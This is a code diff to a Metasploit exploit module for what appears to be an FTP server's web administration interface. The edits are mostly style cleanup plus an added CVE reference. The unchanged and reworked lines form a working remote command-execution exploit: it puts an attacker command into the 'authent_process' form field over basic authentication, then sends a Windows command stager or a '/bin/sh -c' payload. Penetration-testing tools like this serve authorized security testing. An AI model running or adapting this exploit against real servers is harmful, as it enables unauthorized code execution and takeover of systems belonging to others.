@@ -25,10 +25,10 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'License' => MSF_LICENSE,
         'References' => [
+          [ 'CVE', '2012-10028' ],
           [ 'OSVDB', '89105' ],
           [ 'EDB', '23522' ]
         ],
-        'Platform' => %w{win unix},
         'Targets' => [
           [ 'Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => 'vbs' } ],
           [ 'Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'BadChars' => "\x22" } } ]
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
-          'Reliability' => [ REPEATABLE_SESSION, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
         }
       )
     )
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd, opts)
+  def execute_command(cmd, _opts)
     http_send_command("cmd.exe /q /c #{cmd}")
   end
 
@@ -72,46 +72,46 @@ class MetasploitModule < Msf::Exploit::Remote
         'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
         'vars_post' =>
           {
-            'global_smtp' => "",
-            'global_restart' => "",
-            'global_style' => "",
-            'global_bind' => "",
-            'global_passive_ip' => "",
-            'global_passive_match' => "",
-            'global_logon_mode' => "",
-            'global_log_host' => "",
-            'global_login_error' => "",
-            'global_adminip' => "",
-            'global_total_users' => "",
-            'global_con_perip' => "",
-            'global_ssl' => "",
-            'global_ssl_cipher_list' => "",
-            'global_implicit_port' => "",
-            'log_level' => "",
-            'log_home' => "",
-            'global_watcher_program_ul' => "",
-            'global_watcher_program_dl' => "",
+            'global_smtp' => '',
+            'global_restart' => '',
+            'global_style' => '',
+            'global_bind' => '',
+            'global_passive_ip' => '',
+            'global_passive_match' => '',
+            'global_logon_mode' => '',
+            'global_log_host' => '',
+            'global_login_error' => '',
+            'global_adminip' => '',
+            'global_total_users' => '',
+            'global_con_perip' => '',
+            'global_ssl' => '',
+            'global_ssl_cipher_list' => '',
+            'global_implicit_port' => '',
+            'log_level' => '',
+            'log_home' => '',
+            'global_watcher_program_ul' => '',
+            'global_watcher_program_dl' => '',
             'authent_process' => command,
-            'authent_cmdopts' => "",
-            'authent_number' => "",
-            'authent_domain' => "",
-            'global_strip_user_domain' => "",
-            'global_noclass' => "",
-            'global_anon_hammer_over_time' => "",
-            'global_anon_hammer_max' => "",
-            'global_anon_hammer_block_time' => "",
-            'global_port' => "",
-            'global_mgr_port' => "",
-            'global_mgr_ssl_port' => "",
-            'cmd_global_save.x' => "36",
-            'cmd_global_save.y' => "8",
+            'authent_cmdopts' => '',
+            'authent_number' => '',
+            'authent_domain' => '',
+            'global_strip_user_domain' => '',
+            'global_noclass' => '',
+            'global_anon_hammer_over_time' => '',
+            'global_anon_hammer_max' => '',
+            'global_anon_hammer_block_time' => '',
+            'global_port' => '',
+            'global_mgr_port' => '',
+            'global_mgr_ssl_port' => '',
+            'cmd_global_save.x' => '36',
+            'cmd_global_save.y' => '8'
           }
       }
     )
 
     if res and res.body =~ /401 Authorization failed/
-      fail_with(Failure::NoAccess, "Unable to log in!")
-    elsif not (res and res.code == 200)
+      fail_with(Failure::NoAccess, 'Unable to log in!')
+    elsif !(res and res.code == 200)
       fail_with(Failure::Unknown, 'Failed to execute command.')
     end
   end
@@ -120,11 +120,11 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Platform']
     when 'win'
       print_status("#{rhost}:#{rport} - Sending command stager...")
-      execute_cmdstager({ :linemax => 500 })
+      execute_cmdstager({ linemax: 500 })
 
     when 'unix'
       print_status("#{rhost}:#{rport} - Sending payload...")
-      http_send_command(%Q|/bin/sh -c "#{payload.encoded}"|)
+      http_send_command(%(/bin/sh -c "#{payload.encoded}"))
     end
 
     handler
